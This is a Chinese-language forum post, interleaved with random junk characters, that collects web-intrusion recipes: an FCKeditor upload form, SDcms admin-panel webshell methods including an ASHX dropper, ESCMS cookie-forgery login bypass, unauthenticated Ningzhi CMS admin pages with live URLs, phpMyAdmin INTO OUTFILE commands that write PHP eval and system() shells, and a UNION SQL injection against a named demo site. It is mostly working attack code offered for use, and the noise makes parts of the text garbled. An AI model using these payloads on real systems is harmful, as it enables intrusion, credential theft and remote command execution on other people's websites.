7 {6 K% Q1 [2 o9 Z& W<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post"> h9 f: } l1 B1 ?
Upload a new file:<br>& E% _4 ]8 m' Y) b& _" H
<input type="file" name="NewFile" size="50"><br>
" \! u2 t2 h, [8 ?5 C<input id="btnUpload" type="submit" value="Upload">
9 t. W0 ]+ U6 V+ \2 p9 t0 J3 ^4 h</form>
2 \/ i; f. K9 i7 d- I; x-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 ^1 f3 b) V- C+ n m9 r$ B2 Y. D: M" h8 x$ x" v2 ~
SDcms 后台拿webshell
8 l* N6 C& u( B
$ q G* {. Z) d; D, Y* q; g第一种方法:% q( N F4 a6 k4 P$ s8 K
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
|$ r* F/ E8 l0 G/ Q把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx" z7 D2 u5 t9 u" v7 J8 r" m3 A, Y
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
7 [- g# `+ O# s9 R2 s9 q* _4 W% h3 W, R( Q第二种方法:
* U% V" f& ?' F. L进入后台-->系统管理-->系统设置-->系统设置->上传设置;0 Z( @ _% _! K; E0 F- u' y
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!5 Y0 d1 f; k8 `! u( u7 k
第三种方法:
, l) ~% X7 l! N4 G进入后台-->界面管理-->模板文件管理-->创建文件
, Z% ^( a- h. L# G' [文件名写入getshell.ashx
7 A+ ]" E- O6 y9 D$ S5 w内容写入下面内容:. L- Z; F( n- J: S
/====================复制下面的=========================/; c4 z+ N# I3 G) V+ J4 s+ L" |3 X* D
<%@ WebHandler Language="C#" Class="Handler" %>
$ ~, `5 J( A4 `$ d* l& eusing System;5 I' B- R$ f7 k: y
using System.Web;
: c: }, v W& @2 @; p0 ]3 kusing System.IO;, N% H) ?6 z4 ]. Q7 {( _
public class Handler : IHttpHandler {9 M3 V* c$ w5 A4 K6 `
public void ProcessRequest (HttpContext context) {
* g: k# L8 M7 @$ s7 s/ ~5 l1 Pcontext.Response.ContentType = "text/plain";
, x1 h5 N7 S6 `3 c+ }# Q: @StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));- x, L+ Q7 E* g- y
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
8 e2 |9 }2 M: p6 f$ ?, t/ P1 \file1.Flush();' p( Z1 d% I# j1 V6 U' f
file1.Close();
1 Y; W2 C, q- _& e}- |. a' Z: G' D9 |, `% ?( L) M
public bool IsReusable {
5 y, y$ o; Z% {7 Sget {
8 a* E' E) c; w# h5 Q- Areturn false;- L' d" X# t0 b. `' H
}# W) r/ A/ v/ k, A# d0 ?3 z
}
4 Y9 |; d3 h) |5 U u& l2 C/ p}
5 T: y( f% I" s; `/=============================================/) T4 k' G- z* i1 C: X8 [
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
" U; ^ Q, t2 o( @9 s6 x, p会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接) a% T$ R6 `8 e: G4 a
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 C* F/ M! U; b; r
6 U: v$ I: Q. S+ ?6 g3 F7 t
ESCMS网站管理系统0day. A5 J4 f* O$ Q3 c, e
I1 v0 P% f( D7 W/ s
后台登陆验证是通过admin/check.asp实现的# Y- x4 `5 i( M( H" L# X
w9 i, ^5 I4 E7 [0 r- ~% r
首先我们打开http://target.com/admin/es_index.html
o4 B, Y7 E0 g% F7 D然后在COOKIE结尾加上
! }" |2 I- S* S9 _9 d! ~ x& W; ESCMS$_SP2=ES_admin=st0p;# A' b! `8 {7 w- G
修改,然后刷新
+ I! E7 Y1 g6 K/ K7 W" `进后台了嘎..
; l# R" x, G: P$ r+ w然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL2 o1 g+ E S" F1 n; E/ a( h
. S# }5 ^6 U. }% F利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
3 g* X: i* l& p6 ?嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp9 z" ^# }; E& t) o( f
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..! ?8 e" Y+ ?6 A9 O/ q( H" J9 ?% C
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
- n( ~! ~& n, I! Z* Q3 y+ V% W------------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ a+ l: K% L/ E* p4 j- X
+ }( Y. S. B/ p
宁志网站管理系统后台无验证漏洞及修复
3 h+ _2 X& U4 ^; x" Q
5 v4 Y7 [/ y; c+ R- n4 B1 [网上搜了一下,好像没有发布.如有雷同纯粹巧合!/ l W, a6 r( Q
官方网站:www.ningzhi.net! }0 j8 L) h, A- R) d0 U
学校网站管理系统 V.2011版本 % c) {4 C2 j; h
http://down.chinaz.com/soft/29943.htm ! P) }. l8 c: G) Q2 H* ~2 N& Q
其它版本(如:政府版等),自行下载.+ A- F- q n+ ?* ]# H4 s
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
5 ^% {/ ~7 c$ t% T5 O0 P Qlogin.asp代码如下:' R O$ z0 L6 Y; }- t; T
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> , u! w2 k' @6 d: p# t
manage.asp代码我就不帖出来了.反正也没验证.) t1 G9 I6 ]& P5 I
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!* `8 Y3 Q% u+ |' W
漏洞利用:5 |0 x5 a6 z1 E+ g) o
直接访问http://www.0855.tv/admin/manage.asp
# d7 h: j, R# ]5 a+ u+ W数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
( T) ^# ]3 [6 ]8 Q8 r----------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ u; f0 v) h9 H) C. q- x# g
! F3 l6 ]. h2 n, i4 r
phpmyadmin拿shell的四种方法总结及修复
, A2 l3 d9 B" x& h+ {+ |$ c6 I0 X( F5 R0 ]
方法一:3 d9 s+ G! e$ w5 E3 c
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );" r+ O5 i1 Y7 s# w8 k/ F* |
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');- x, T5 Y; y$ X' C$ a, O* j! \8 r
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
" ?: N) V9 S' e) o5 M% O3 N1 b----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php. O4 `! J) e+ R' U( J3 l
一句话连接密码:7on3 r6 a$ N6 \. C+ N9 r" o
方法二:
- j; b% o* h& q7 _) k2 U t X1 z读取文件内容: select load_file('E:/xamp/www/s.php');6 g3 g- @) d7 [1 \
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'9 D3 g u' `6 y, `
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
/ P" Y6 p4 c2 L# `$ B0 b X方法三:( x0 P9 Z. |& z* Q
JhackJ版本 PHPmyadmin拿shell
, C8 U; u3 C3 h `* \ D- g9 KCreate TABLE study (cmd text NOT NULL);& b% z. d; j" N2 U6 G
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
1 q6 ^9 A! n$ t( G. Wselect cmd from study into outfile 'E:/wamp/www/7.php';4 q" }& S6 W8 H# m# N" _
Drop TABLE IF EXISTS study;2 {5 x5 E8 P6 T$ V% Q+ B
<?php eval($_POST[cmd])?>
- H! `& G) s: @3 L( S tCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
" h; p( B1 X: B3 yINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
2 t4 o, o! E+ h8 a% V% r$ t$ V; ?' i- DSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
# b/ Y6 A \! i- V, Q2 ]+ vDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。3 @; y" W8 X2 e# g
方法四:
3 }' r% A; e! t( L- k- @select load_file('E:/xamp/www/study.php');8 N5 r& U0 P- l. B/ V* t
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
|; g. q( _4 x5 Q e1 f0 I然后访问网站目录:http://www.2cto.com/study.php?cmd=dir& I6 U( i u3 C# a R
------------------------------------------------------------------------------------------------------------------------------------------------------------------------ p4 u* k7 b4 I& S- H4 {/ N6 P! T% s
! T) w0 _+ L: { {1 ]9 |' m# V( Y6 m
NO.001中学网站管理系统 Build 110628 注入漏洞9 W. y+ \/ L- M2 }0 G" c
9 w( `# ^+ A$ J( T. f% w
NO.001中学网站管理系统功能模块:
$ _. ^7 _6 U. |! \1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等8 Z3 ~- [; s3 O% Q( g2 J0 ]
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
$ V u5 D# l7 k q3 G: X& l; D& w) S3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息# L5 N+ d4 D! D
4.视频图片管理:一级分类,动态添加视频或者图片等信息( E5 H- X _7 T' h
5.留言管理:对留言,修改,删除、回复等管理. U; U$ n6 s3 @# e
6.校友频道:包括校友资料excel导出、管理等功能
: ^, y8 _; u4 d6 Q" m: S6 a: o4 C }7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
, E& |0 r: Z' e默认后台:admin/login.asp/ |. _0 w- t3 p% t% `8 }
官方演示:http://demo.001cms.net0 Y- [# S, V' n$ h% k
源码下载地址:http://down.chinaz.com/soft/30187.htm9 z0 G# r" E H
EXP:6 Q, ~# I2 g" z* \+ K( [* H
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
- A( y' h9 |, s$ |3 W测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin; R, j; G& X \$ x9 Z- B
getshell:后台有备份,你懂的1 N0 ~# g$ j. y2 N/ ^
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。% C+ \) J" r: `. C6 b4 T" t9 _* Y
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对